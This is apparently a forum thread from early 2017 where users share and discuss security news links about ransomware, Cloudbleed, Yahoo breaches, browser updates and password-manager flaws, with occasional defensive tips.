Security 2016, Security Symantec Endpoint Protection, Tencent PC Manager,
Trend Micro Maximum Security 10, and Webroot SecureAnywhere."
pol
-
also if I read it correctly Avast! was the only product not degrading the TLS / security of connection ...
(tho it had other issues mentioned later in the report)
-
Security vulnerabilities fixed in Firefox 51.0.3
https://www.mozilla.org/en-US/security/advisories/mfsa2017-04/
-
New Mac malware detected this week, based on primitive Windows techniques using Word macros
https://9to5mac.com/2017/02/09/new-mac-malware-detected-this-week-based-on-primitive-windows-techniques-using-word-macros/
-
Protecting your data at border crossing: https://www.zdziarski.com/blog/?p=6918
polonus
-
Would be interesting to see the differences and discrepances between: https://map.norsecorp.com/#/
and the new http://tld.mcafee.com/
Especially here with Sauron attacks allegedly fitting into the new strategy of alleged Russian cyberthreats:
http://www.telegraph.co.uk/news/2017/02/12/dozens-cyber-attacks-target-heart-government-every-month-gchq/
polonus
-
What is Pharming, and (most importantly) how can you prevent it?
http://www.thewindowsclub.com/what-is-pharming
-
Big issue in Germany now over Firefox Focus collecting and transfering data:
https://www.reddit.com/r/technology/comments/5tmhf4/mozillas_firefox_focus_the_privacy_browser_is/
polonus
-
Mirai Widens Distribution with New Trojan that Scans More Ports
http://blog.trendmicro.com/trendlabs-security-intelligence/mirai-widens-distribution-new-trojan-scans-ports/
https://virustotal.com/en/file/2de4851dcaaa4b5ed8421a0c72ceed64497c147d85cbfb1928d6baf7760c0c46/analysis/
https://virustotal.com/en/file/bdad4a77b678fda8328b2fae290e525a553c490214d43df377dbeb3132879673/analysis/
https://virustotal.com/en/file/4856706c088f66965d714fe09af22ee56d84483278582ff3dd8f98bc3c5862ab/analysis/
https://virustotal.com/en/file/2d8cd23e33e56ab396960a0d426c232f6d8905e2ac5833f37c412b699135f6ce/analysis/
-
Microsoft Delays This Month’s Security Updates Due to Last-Minute Bug
http://news.softpedia.com/news/microsoft-delays-this-month-s-security-updates-due-to-last-minute-bug-512937.shtml
-
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb17-04.html
-
Has the time come to say goodbye to the Ghostery extension?
Ghostery acquired by German firm CLIQZ and Burda (fashion glossy publisher).
Re: https://www.ghostery.com/blog/ghostery-news/ghostery-acquired-cliqz/
Are they gonna sell your personal Ghostery data to the highest bidder now.
You were the product all the time, did not you realize?
polonus
-
Has the time come to say goodbye to the Ghostery extension?
Ghostery acquired by German firm CLIQZ and Burda (fashion glossy publisher).
Re: https://www.ghostery.com/blog/ghostery-news/ghostery-acquired-cliqz/ (https://www.ghostery.com/blog/ghostery-news/ghostery-acquired-cliqz/)
Are they gonna sell your personal Ghostery data to the highest bidder now.
You were the product all the time, did not you realize?
polonus
It was recently removed from the list of programs I recommend.
One more good program choosing profit over integrity. :(
-
Has the time come to say goodbye to the Ghostery extension?
Ghostery acquired by German firm CLIQZ and Burda (fashion glossy publisher).
Re: https://www.ghostery.com/blog/ghostery-news/ghostery-acquired-cliqz/
Are they gonna sell your personal Ghostery data to the highest bidder now.
You were the product all the time, did not you realize?
polonus
Me, I tried it a long time ago but it conflicted with another add-on (I can't recall which) so it became history right then.
-
i would not be worried yet about the Ghostery, the new Company seems to have clean track and it's located in Germany where privacy laws are quite good
-
Enforce Flash to be updated in Chrome.
You might have updated chrome, still your flashplayer may have an outdated version. You are vulnerable!
You can enforce a Flash update by typing chrome://components in the address bar.
Look in the listing there for Adobe Flash Player and ignore Status - No Update,
but look at the version number.
Anything other than version 24.0.0.221 , and you have to update immediately.
polonus
-
Enforce Flash to be updated in Chrome.
You might have updated chrome, still your flashplayer may have an outdated version. You are vulnerable!
You can enforce a Flash update by typing chrome://components in the address bar.
Look in the listing there for Adobe Flash Player and ignore Status - No Update,
but look at the version number.
Anything other than version 24.0.0.221 , and you have to update immediately.
polonus
Unless you're blocking updates, this will auto update. It did for me:
(http://screencast-o-matic.com/screenshots/u/Lh/1487274497306-29073.png)
-
The Rise in SSL-based Threats
https://www.zscaler.com/blogs/research/rise-ssl-based-threats-1 (https://www.zscaler.com/blogs/research/rise-ssl-based-threats-1)
-
75% of All Ransomware Developed by Russian-Speaking Criminals
https://www.bleepingcomputer.com/news/security/75-percent-of-all-ransomware-developed-by-russian-speaking-criminals/
-
Windows gdi32.dll heap-based out-of-bounds reads / memory disclosure in EMR_SETDIBITSTODEVICE and possibly other records
https://bugs.chromium.org/p/project-zero/issues/detail?id=992
-
New TeamSpy Malware Campaign Turns TeamViewer into Spy Tool
http://news.softpedia.com/news/new-teamspy-malware-campaign-turns-teamviewer-into-spy-tool-513115.shtml (http://news.softpedia.com/news/new-teamspy-malware-campaign-turns-teamviewer-into-spy-tool-513115.shtml)
-
Alarm bells should go off on the security and existing vulnerabilities of DNSSEC.
Some banking sites and sites of internet providers haven't got secure DNSSEC implementations or exploitable vulnerabilities.
Threats of DNSSEC insecurity causes spoofing and redirections (to malcode).
Check your DNSSEC here: https://dnssec-name-and-shame.com/domain
Also: https://dnssec-debugger.verisignlabs.com/ & here: http://dnsviz.net/
Extension to check websites inside the browser: DNSSEC/TLSA validator: https://www.dnssec-validator.cz/
polonus
-
Unstoppable JavaScript Attack Helps Ad Fraud, Tech Support Scams, 0-Day Attacks
https://www.bleepingcomputer.com/news/security/unstoppable-javascript-attack-helps-ad-fraud-tech-support-scams-0-day-attacks/ (https://www.bleepingcomputer.com/news/security/unstoppable-javascript-attack-helps-ad-fraud-tech-support-scams-0-day-attacks/)
-
Microsoft Security Bulletin MS17-005 - Critical
Security Update for Adobe Flash Player (4010250)
https://technet.microsoft.com/library/security/ms17-005.aspx
-
Smartphone users should stay safe from QRishing scams
http://www.thewindowsclub.com/qrishing-scams-qr-code-smartphone
-
Rogue Chrome extension pushes tech support scam
https://blog.malwarebytes.com/threat-analysis/2017/02/rogue-chrome-extension-pushes-tech-support-scam/?utm_source=googleplus&utm_medium=social
Too many people just add an extension without doing the necessary research.
Just because an extension look good doesn't mean it is good.
I can't stress and/or say this enough "Look before you leap".
-
SHA1 is dead now https://shattered.it/
https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html
-
Protect yourself from "whaling" scams and "clickjacking" attacks
http://www.thewindowsclub.com/what-are-whaling-scams
http://www.thewindowsclub.com/clickjacking-attacks-prevention
-
https://bugs.chromium.org/p/project-zero/issues/detail?id=1139
https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
4.3 milion webs could be affected by random information leakage, time to change passwords and setup 2FA everywhere
https://github.com/pirate/sites-using-cloudflare
-
Hi Dwarden,
When will they finally admit the general infrastructure of bulk hosters as a rule is insecure by design.
We all and specially here on the old continent have been very naive to think our data were securely dealt with,
and could not leak to the highest bidders. To admit this pnewed holed status is one thing,
to do something about it is another.
One fails to meet standards anywhere. Small example when that biggest name in ketchup (name starts with H.)could not meet up with the rabbinical prescribed amout of genuine tomato extract in their ketchup product for Jerusalem so it would loose the name ketchup for the product, is a shame. Despite of that they still go around with tinker bells in Schul'.
In the meantime you can check on what websites you leaked private data here: http://www.doesitusecloudflare.com/
As a volunteer website security analyst here and website error-hunter I see the insecurity of the general infrastructure almost every day.
When are they gonna tackle the problems or are there some "vested interests"that would rather not see that day.
Damian
-
What many European website owners did now or will do as i assume?
I guess a lot of American websites follow their example.
Lots of websites in Europe did or will do the following.
Research the impact for their websites.
Research suspicious logins for accounts on their site, none detected probably.
CloudFlare reverse proxy functionality de-installed.
All password reset tokens been reset.
All existing (https-)sessions have been reset.
All passwords of accounts were reset.
Password reset-link to website, mailed to users.
Migrationplan started to halt the use of CloudFlare completely.
Bye, bye CloudFlare! Extra bonus, tor-users do not have to fill out captcha's all the time.
When you went here earlier, you could have known: http://www.crimeflare.com/
When you have lost "trust", you have a gigantic problem how to gain it back again.
Damian
-
Beware of this new Chrome “font wasn’t found” hack!
https://neosmart.net/blog/2017/beware-of-this-new-chrome-font-wasnt-found-hack/
https://www.virustotal.com/en/file/7e62a5ca20cfb5da90fe7402f413321c9ede7e230e8b4fa2f1a4e516e8ae8e34/analysis/
-
Microsoft Edge and IE: Type confusion in HandleColumnBreakOnColumnSpanningElement
https://bugs.chromium.org/p/project-zero/issues/detail?id=1011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0037
-
Database Ransomware Attackers Migrate to MySQL
https://www.infosecurity-magazine.com/news/database-ransomware-attackers/ (https://www.infosecurity-magazine.com/news/database-ransomware-attackers/)
-
Gigantic data-breach in cloudbleed with CloudPets: https://twitter.com/troyhunt/status/836320506127101953
& https://motherboard.vice.com/en_us/article/internet-of-things-teddy-bear-leaked-2-million-parent-and-kids-message-recordings
Your iAAs is as secure as the connection it takes.
When you do no longer play with your kids and communicate through an insecure app, you are in for such a fiasco.
Hold the CEO of that firm liable and fine them into banktrupcy, that should set an end to it and also warn others to pay more attention where security is concerned.
polonus
-
The latest ransomware threat: Doxware
http://www.networkworld.com/article/3174678/security/the-latest-ransomware-threat-doxware.html (http://www.networkworld.com/article/3174678/security/the-latest-ransomware-threat-doxware.html)
-
Is your Teddy Bear hacked :o
https://www.troyhunt.com/data-from-connected-cloudpets-teddy-bears-leaked-and-ransomed-exposing-kids-voice-messages/
-
Dridex’s Cold War: Enter AtomBombing
The Dridex malware project continues to evolve, and 2017 is likely to be another year of change for this Trojan.
https://securityintelligence.com/dridexs-cold-war-enter-atombombing/ (https://securityintelligence.com/dridexs-cold-war-enter-atombombing/)
-
Open bug at Bluecoat has not been patched within one and a half year's time and now prevents Google from a TLS-update: https://bugs.chromium.org/p/chromium/issues/detail?id=694593
Sounds like a flagellant's race, one step forward and two steps back. A shame really obstructing a more secure infrastructure.
As rumours have it and the same Bluecoat bug existed inside TLS 1.2 Bluecoat left the bug there for nine years. In digital time that is almost a century and could be qualified as persistent hole.
polonus
-
Did you also experienced this on Febr. 24th last? We, the wife and I, experienced it on our Google Android accounts, but failed to get an explanation why it happened. Read about it here: https://www.theregister.co.uk/2017/03/01/google_still_silent_on_mass_logout/
The disappeared explanation by Google's: Google posted and then deleted a message related to the deauthentication event on its Cloud Status Dashboard.
The disappeared message, cited in various online posts on the topic, reportedly said, "To summarize; [sic] some long-lived OAuth tokens have inadvertently been invalidated."
That makes sense: token invalidation would require anyone using a Google Account-related service to login again. It also may explain the wording some people saw when asked by Google to log back in: that a change had been made to their account, although no such change was visible in the security section of their account settings.
That said, the disappearance of the dashboard post is puzzling.
Anyone to speculate what it just was that Google had to hide from us all here?
What CloudPets more now will come out of the Google hat? :o ;D ;D ;)
Failing infrastructure all around, all hands on deck, friends!
polonus (volunteer website security analyst and website error-hunter)
-
Yahoo says about 32 million accounts accessed using 'forged cookies'
http://www.reuters.com/article/us-yahoo-databreach-idUSKBN1685UY
-
Crypt0L0cker Ransomware is Back with Campaigns Targeting Europe
https://www.bleepingcomputer.com/news/security/crypt0l0cker-ransomware-is-back-with-campaigns-targeting-europe/ (https://www.bleepingcomputer.com/news/security/crypt0l0cker-ransomware-is-back-with-campaigns-targeting-europe/)
-
Alleged Master Keys for the Dharma Ransomware Released on BleepingComputer.com
https://www.bleepingcomputer.com/news/security/alleged-master-keys-for-the-dharma-ransomware-released-on-bleepingcomputer-com/ (https://www.bleepingcomputer.com/news/security/alleged-master-keys-for-the-dharma-ransomware-released-on-bleepingcomputer-com/)
-
32 million Yahoo accounts hacked through cookie fraud:
https://www.sec.gov/Archives/edgar/data/1011006/000119312517065791/d293630d10k.htm
Is not it time to let Yahoo Inc. go the way of the dinosaur?
A rep damage that can never ever be undone.
And they missed all opportunities from the word go.
polonus
-
Here is another article (check out the highlighted text). https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/
Yet there are still some like myself who still find Yahoo to be very useful. I rely on Yahoo everyday for almost everything.
-
Here is another article (check out the highlighted text). https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/ (https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/)
Yet there are still some like myself who still find Yahoo to be very useful. I rely on Yahoo everyday for almost everything.
What does an unsecure Yahoo have to offer that makes it irreplaceable by something more secure ???
-
Windows Anti-malware Market Share Reports
https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27
Click on vendor name or the wheel for details ;)
-
Security slip-ups in 1Password and other password managers 'extremely worrying'
https://www.theregister.co.uk/2017/02/28/flaws_in_password_management_apps/
This is why i have my password stored in my head ;D
!! Update 2017-03-01: All reported vulnerabilities are fixed by the vendors !!
https://team-sik.org/trent_portfolio/password-manager-apps/
-
CVE-2016-9892 - Remote Code Execution as Root via ESET Endpoint Antivirus 6
Product: ESET Endpoint Antivirus 6 for macOS > http://seclists.org/fulldisclosure/2017/Feb/68
-
Decryption Tools for Dharma Ransomware Variants are Now Available
http://news.softpedia.com/news/decryption-tools-for-dharma-ransomware-variants-are-now-available-513508.shtml (http://news.softpedia.com/news/decryption-tools-for-dharma-ransomware-variants-are-now-available-513508.shtml)
-
The weakest link online often comes in the form of human interference: https://aws.amazon.com/message/41926/
Amazon now will look for ways to faster restore s3-sub systems whenever there is trouble with the cloud.
polonus
-
A way to avoid a so-called fat finger disaster as happened at amazon's:
• Give in a particular command;
• Then do as we write it here and lift your fingers completely from the keyboard;
• Have a hard look at that command again;
• When at a second glance the command looks fine, ENTER.
This procedure has helped to prevent many a disaster, but it does not stop all tragedies ...
Quote info credits go to MvdJong
polonus
-
Here is another article (check out the highlighted text). https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/ (https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/)
Yet there are still some like myself who still find Yahoo to be very useful. I rely on Yahoo everyday for almost everything.
What does an unsecure Yahoo have to offer that makes it irreplaceable by something more secure ???
Bob, By the time the breach went public is was too late to do anything but take note and take extra security precautions.
Also, since the breach(s) Yahoo has taken steps to secure users accounts. Don't forget Google has been breached
in the past. I have had to change my Google password more than I have had to with Yahoo in the last 8 years. Google,
like Yahoo, also had to change their culture. I know about Google's breach because Google has sent me several emails
warning me about account breaches.
-
Here is another article (check out the highlighted text). https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/ (https://www.bleepingcomputer.com/news/security/yahoo-ceo-gives-annual-bonus-to-employees-after-company-confirms-new-hacks/)
Yet there are still some like myself who still find Yahoo to be very useful. I rely on Yahoo everyday for almost everything.
What does an unsecure Yahoo have to offer that makes it irreplaceable by something more secure ???
Bob, By the time the breach went public is was too late to do anything but take note and take extra security precautions.
Also, since the breach(s) Yahoo has taken steps to secure users accounts. Don't forget Google has been breached
in the past. I have had to change my Google password more than I have had to with Yahoo in the last 8 years. Google,
like Yahoo, also had to change their culture. I know about Google's breach because Google has sent me several emails
warning me about account breaches.
Yahoo was just hacked again. :)
-
If you are referring to the most recent article, it's about a breach that happened about a year ago before more strict encryption was in place.
Since Yahoo put harder encryption methods in place no new breach has been reported. I'm sticking with Yahoo.
BTW, I also have Google and MSN accounts. I just prefer Yahoo (lots of services) except for my default search engine Google.
-
Your computer, your choice. :)
-
Spammers leak data of 1.4 billion e-mail accounts:
https://mackeeper.com/blog/post/339-spammergate-the-fall-of-an-empire
These spammers are good for sending 1 billion spam mails a day. :o
polonus
-
SQL Injection Vulnerability in NextGEN Gallery for WordPress
https://blog.sucuri.net/2017/02/sql-injection-vulnerability-nextgen-gallery-wordpress.html
-
@Bob
I just received another alert from Yahoo concerning another breach which occurred just before stricter encryption was put into place.
I might be stubborn, but I'm sticking with Yahoo. And, I'm guessing, so are a lot of other forum members.
-
@Bob
I just received another alert from Yahoo concerning another breach which occurred just before stricter encryption was put into place.
I might be stubborn, but I'm sticking with Yahoo. And, I'm guessing, so are a lot of other forum members.
https://forum.avast.com/index.php?topic=52252.msg1374848#msg1374848 :)
-
WordPress 4.7.3 Security and Maintenance Release
https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
-
Windows Anti-malware Market Share Reports
https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27
Click on vendor name or the wheel for details ;)
the question is why are still Avast! and AVG separated and not one product, it would 25+% then
-
Windows Anti-malware Market Share Reports
https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27 (https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27)
Click on vendor name or the wheel for details ;)
the question is why are still Avast! and AVG separated and not one product, it would 25+% then
Primarily because you still have both brands out there.
-
Windows Anti-malware Market Share Reports
https://www.metadefender.com/stats/anti-malware-market-share-report#!/?date=2017-02-27
Click on vendor name or the wheel for details ;)
the question is why are still Avast! and AVG separated and not one product, it would 25+% then
This has been explained, by Vlk I believe. Going to a single product very quickly would be likely to upset both sets of users.
-
Ever so often we have to look here: http://downdetector.com/
Just recently for the M$ outage
(Redmond never commented, all we have now coming as an explanation,
is only on a need to know basis).
polonus
-
new CIA wikileaks reveal(s) in progress https://wikileaks.org/ciav7p1/
-
Firefox is ending support for Windows XP and Vista (https://support.mozilla.org/t5/Install-and-Update/Important-Firefox-is-ending-support-for-Windows-XP-and-Vista/ta-p/31270)
In March 2017, if you are using Firefox with Windows XP or Windows Vista, you will automatically be updated to the Extended Support Release version of Firefox. more...
-
Firefox is ending support for Windows XP and Vista (https://support.mozilla.org/t5/Install-and-Update/Important-Firefox-is-ending-support-for-Windows-XP-and-Vista/ta-p/31270)
In March 2017, if you are using Firefox with Windows XP or Windows Vista, you will automatically be updated to the Extended Support Release version of Firefox. more...
Yes, my firefox version on XP is just about to update to the esr version.
-
CIA hacking tools: Should we be worried?
http://www.bbc.com/news/technology-39205405
-
Don’t Use Your Antivirus’ Browser Extensions: They Can Actually Make You Less Safe
https://www.howtogeek.com/239950/dont-use-your-antivirus-browser-extensions-they-can-actually-make-you-less-safe/
-
Firefox is ending support for Windows XP and Vista (https://support.mozilla.org/t5/Install-and-Update/Important-Firefox-is-ending-support-for-Windows-XP-and-Vista/ta-p/31270)
As opposed to always when pressing "update" will make it download and install the new version, this time it doesn't actually update to v52 ESR, it just restarts the browser and then shows this notice that you're on the "esr" channel, but it's still v51. (Similar to DavidR's screen clipping above.)
This is despite the quote (http://support.mozilla.org/t5/Install-and-Update/Important-Firefox-is-ending-support-for-Windows-XP-and-Vista/ta-p/31270) from the article:
Firefox version 52 will be the last complete update for Windows XP and Windows Vista. Security updates will be released, but no new features.
-
After another restart mine did eventually show the Firefox ESR on about firefox screen.
-
After another restart mine did eventually show the Firefox ESR on about firefox screen.
Same here - it took several tries.
-
Spammers expose their entire operation through bad backups
http://www.csoonline.com/article/3176433/security/spammers-expose-their-entire-operation-through-bad-backups.html
-
New RanRan Ransomware Uses Encryption Tiers, Political Messages
https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/ (https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/)
-
New Cerber Ransomware Variant Released That Keeps Original Filename
https://www.bleepingcomputer.com/news/security/new-cerber-ransomware-variant-released-that-keeps-original-filename/ (https://www.bleepingcomputer.com/news/security/new-cerber-ransomware-variant-released-that-keeps-original-filename/)
Good news is that AVG detects it as JS/Downloader.Agent.71_P Hope Avast also do the same.After all avast and AVG are one company.:D
Virus Total-https://www.virustotal.com/en/file/2e264025227b06e1f4e04c833e37ef887680186c5642827ddbe4ef09a3a44b05/analysis/ (https://www.virustotal.com/en/file/2e264025227b06e1f4e04c833e37ef887680186c5642827ddbe4ef09a3a44b05/analysis/)
-
New RanRan Ransomware Uses Encryption Tiers, Political Messages
https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/
(https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/)
Palo Alto says they already created two decrypters (https://github.com/pan-unit42/public_tools/tree/master/ranran_decryption) to recover data for victims of this new threat.
-
TorrentLocker Changes Attack Method, Targets Leading European Countries
http://blog.trendmicro.com/trendlabs-security-intelligence/torrentlocker-changes-attack-method-targets-leading-european-countries/
-
Credit Card Stealer Disguises as Google Chrome Browser
https://www.bleepingcomputer.com/news/security/credit-card-stealer-disguises-as-google-chrome-browser/
-
Only approx. a quarter of all websites, made using PHP, is known to be secure.
Time to check websites' PHP code is secure:
http://learnwebtutorials.com/things-check-to-make-sure-php-code-is-secure
link credits go to the article authors.
PHP can be inherently insecure in the hands of first year and inexperienced coders that do not know what security measures to take.
Open to script injection vulnerabilities, cross site scripting, XSS threats etc. Also requests may not guarantee what you get back in return. So without the right security in place there is room to get extra worried. Also consider the threats being added by script and plug-in code that has not been checked.
polonus
-
Number of new malware variants reaches highest level since October 2016
https://www.symantec.com/connect/blogs/latest-intelligence-february-2017
-
Apple, Google, And The CIA
https://labsblog.f-secure.com/2017/03/09/apple-google-and-the-cia/
F-Secure FAQ Related To CIA WikiLeaks Docs
https://labsblog.f-secure.com/2017/03/09/faq-related-to-cia-wikileaks-docs/
-
Number of new malware variants reaches highest level since October 2016
https://www.symantec.com/connect/blogs/latest-intelligence-february-2017
This doesn't really surprise me, I would expect it to be an ever increasing number, but it looks like the malware writers go on holiday too ;)
-
CryptoBlock ransomware and its C2
https://blog.malwarebytes.com/threat-analysis/2017/03/cryptoblock-and-its-c2/ (https://blog.malwarebytes.com/threat-analysis/2017/03/cryptoblock-and-its-c2/)
-
When a webhosting nameserver exposes it's name server software server version to the world and hackers, like
9.9.4-RedHat-9.9.4-29.el7_2.4 -> http://www.dnsinspect.com/mijndnsserver.nl/10048179
you should not be too surprised that with a political conflict at hand websites you host are gonna be defaced.
As always now website security is a last resort issue!
polonus
-
PetrWrap Ransomware Is a Petya Offspring Used in Targeted Attacks
https://www.bleepingcomputer.com/news/security/petrwrap-ransomware-is-a-petya-offspring-used-in-targeted-attacks/ (https://www.bleepingcomputer.com/news/security/petrwrap-ransomware-is-a-petya-offspring-used-in-targeted-attacks/)
-
Embittered Enjey Ransomware Developer Launches DDoS Attack on ID Ransomware
https://www.bleepingcomputer.com/news/security/embittered-enjey-ransomware-developer-launches-ddos-attack-on-id-ransomware/ (https://www.bleepingcomputer.com/news/security/embittered-enjey-ransomware-developer-launches-ddos-attack-on-id-ransomware/)
-
Present-day WWW looks as fragile as a sand-castle
Exploitable javascript code libraries all over the place.
Inherently holed and insecure infrastructure.
And it won't be any better for the forseeable future.
Read: https://www.theregister.co.uk/2017/03/14/outdated_javascript_libraries_weaken_web_security/
Some here, inclusing little old me, are hammering the subject endlessly but almost in vain,
almost as not a soul seems interested to do something about it.
Hey baby, baby, it is a wild wild wild world out there on most of these insecure online websites!
Interesting survey results for those interested in website development and security: https://stackoverflow.com/insights/survey/2016
polonus (volunteer website security analyst and website error-hunter)
-
New Imeij IoT Malware Targets AVTech Equipment
https://www.bleepingcomputer.com/news/security/new-imeij-iot-malware-targets-avtech-equipment/
-
AV the fine balance between protecting your private data and being a concern or threat to your privacy?
Read: https://www.theregister.co.uk/2017/03/17/security_software_is_a_threat_to_your_privacy_too/
polonus
-
Star Trek Themed Kirk Ransomware Brings us Monero and a Spock Decryptor!
https://www.bleepingcomputer.com/news/security/star-trek-themed-kirk-ransomware-brings-us-monero-and-a-spock-decryptor/ (https://www.bleepingcomputer.com/news/security/star-trek-themed-kirk-ransomware-brings-us-monero-and-a-spock-decryptor/)
-
All firefox users should read here, it was Pwn2Own hacked the other day, see: https://forum.avast.com/index.php?topic=199002.msg1378499#msg1378499 and here: http://forums.mozillazine.org/viewtopic.php?f=38&t=2888507
to see the problems with run of the mill browsers go on and on in an endless stream.
Thanks to -midnight for a very early heads-up ;)
polonus
-
All firefox users should read here, it was Pwn2Own hacked the other day, see: https://forum.avast.com/index.php?topic=199002.msg1378499#msg1378499 and here: http://forums.mozillazine.org/viewtopic.php?f=38&t=2888507
to see the problems with run of the mill browsers go on and on in an endless stream.
<snip>
Not sure if your 2nd link is valid/current, given it is was Posted November 14th, 2014, 12:11 pm. All Browsers are constantly under attack, the more market share, the more of a target they will be.
-
@DavidR,
The second link was to show how that same issue now via an integer overflow was used (revived in another context) in the most recent Pwn2Own hack.
So insecurity is like music being played from a Dutch grinding organ. They use the same blocks (flaws) over and over again to play their favourite tunes and melodies.
Here a golden oldie from 2014 was revived. This is because digital infrastructure is insecure by design. So we have started out with a "a priori"unsafe aka insecure model and have built further onto that.
What has been INsecure from the word go, can never be secure(d) again or it has to be re-built up again from scratch and no one will or can (afford to) do that. We have to live in that world now. Do not trust a thing, and look for a bug everywhere around you, disclosed or not.
polonus
-
@DavidR,
The second link was to show how that same issue now via an integer overflow was used (revived in another context) in the most recent Pwn2Own hack.
<snip>
polonus
The same can be said of all browsers and if you want Microsoft Windows, we are still getting security updates for the same sort of issues time and again, Permission Escallation, etc. going back through all of the Window OS releases purporting to be the most secure yet.
-
Big Surprise: Chinese PUPs Deliver Backdoored Drivers
https://www.bleepingcomputer.com/news/security/big-surprise-chinese-pups-deliver-backdoored-drivers/ (https://www.bleepingcomputer.com/news/security/big-surprise-chinese-pups-deliver-backdoored-drivers/)
-
Big Surprise: Chinese PUPs Deliver Backdoored Drivers
https://www.bleepingcomputer.com/news/security/big-surprise-chinese-pups-deliver-backdoored-drivers/ (https://www.bleepingcomputer.com/news/security/big-surprise-chinese-pups-deliver-backdoored-drivers/)
"For recent Windows 10 versions, the driver won't load past build 14393 or version 1607."
Another reason to update to the latest version of Windows 10.
-
Vast increase of hacked websites seen: https://webmasters.googleblog.com/2017/03/nohacked-year-in-review.html
This is unfortunate news and it means that the likes of Eddy, others and little old me will have to report many more malicious, suspicious and insecure websites in the coming future in the "virus and worms section" of these here forums.
If only people would only update & patch, better secure & use best practices, better configure & better retire what is unsafe, we would not be in that awfully insecure infrastructure situation we have now.
Alas the situation gets worse and worse and as far as I can see no better times in sight.
polonus (volunteer website security analyst and website error-hunter)
-
New LLTP Ransomware Appears to be a Rewritten Venus Locker
https://www.bleepingcomputer.com/news/security/new-lltp-ransomware-appears-to-be-a-rewritten-venus-locker/ (https://www.bleepingcomputer.com/news/security/new-lltp-ransomware-appears-to-be-a-rewritten-venus-locker/)
-
vBulletin Hack Exposes 820,000 Accounts from 126 Forums
http://news.softpedia.com/news/vbulletin-hack-exposes-820-000-accounts-from-126-forums-513416.shtml (http://news.softpedia.com/news/vbulletin-hack-exposes-820-000-accounts-from-126-forums-513416.shtml)
-
GoDaddy acquires Sucuri's. Often the claims that websites were fully secured seemed not quite appropriate.
Will Sucuri offer similar services in the future, like they did in the past, seems to be seen.
polonus
-
GoDaddy acquires Sucuri's. Often the claims that websites were fully secured seemed not quite appropriate.
Will Sucuri offer similar services in the future, like they did in the past, seems to be seen.
polonus
More here: https://blog.sucuri.net/2017/03/godaddy-sucuri-building-a-security-platform-for-every-website-owner.html
-
Google Chrome to Distrust Symantec SSLs for Mis-issuing 30,000 EV Certificates
http://thehackernews.com/2017/03/google-invalidate-symantec-certs.html
-
Google Chrome to Distrust Symantec SSLs for Mis-issuing 30,000 EV Certificates
http://thehackernews.com/2017/03/google-invalidate-symantec-certs.html (http://thehackernews.com/2017/03/google-invalidate-symantec-certs.html)
Good for Avast :) They might get a few more customers. :)
-
Man in the Middle Strategies either by AV or Google for that matter are never advancing security. And root-certificated as such is 'bad practice" period.
As Google rules the market with Google Analytics and Adsense on almost all and every website, they now may have planned this well in advance to have a gigantic advantage. Bye bye Let's Encrypt etc. Now we may see why they started the HTTPS Everywhere strategy.
Their schemes may enhance CA security as a rule, but it also certainly will pay off for them grand scale.
Microsoft was also continuously not following protocol guidelines, just bending the rules everywhere to what suited their policies and monopolistic schemes best.
polonus
-
Do not use it for the time being, LastPass, they keep finding holes in it!
I wonder if it ever was really secure: https://twitter.com/taviso/status/844312124541186048
and https://blog.lastpass.com/2017/03/security-update-for-the-lastpass-extension.html/
Use a piece of paper and some terrible handwriting???????
polonus
-
Or use an enigma machine
-
Cerber Starts Evading Machine Learning
http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/
-
Cerber Starts Evading Machine Learning
http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/
FYI guys,had already discussed about the Dropbox abuse with some of the avast analysts a month ago and they came up with a solution.
Dropbox links like this is detected by avast as JS:RansomDownloader-B[Trj] even if avast doesn't see it on virus total we actually are being potected I can assure that since I have seen such links this week that were missed on VT whereas when I tried downloading it,avast was stopping it.
This is old news actually :slowpokes: probably another PR nonsense for a attack that is almost a month old.
Still interesting read as this is essentially the js download from Dropbox is a downloader that downloads a binary.So if you detect the dropped binary it's game over and there is where machine learning comes in.
-
Still interesting read as this is quite misleading... essentially the js download from Dropbox is a downloader that downloads a binary.So if you detect the dropped binary it's game over and there is where machine learning comes in.
That is explained there
This is old news actually :slowpokes: probably another PR nonsense for a attack that is almost a month old.
If so then all AV vendors do it
And somone need to take the time to analyse and write this, that is not done the same day as they see a thing like this ;)
-
Hi Pondus,
And they 'play'/run the same old working exploits with little variants on the main theme over and over again.
Just like putting a wooden block into a grinding organ and you get the tune you want.
They do not have to write that stack over and over again, just adjust it....
polonus
-
The infection isn't exactly bypassing the machine learning.Of course the downloader is part is just a addition to the infection chain but I think Av's will detect the downloaded binaries in some way at least avast does.
Let me know your thoughts.
Best,
TI
-
The infection isn't exactly bypassing the machine learning.Of course the downloader is part is just a addition to the infection chain but I think Av's will detect the downloaded binaries in some way at least avast does.
Let me know your thoughts.
Best,
TI
Machine Learning and Evasion
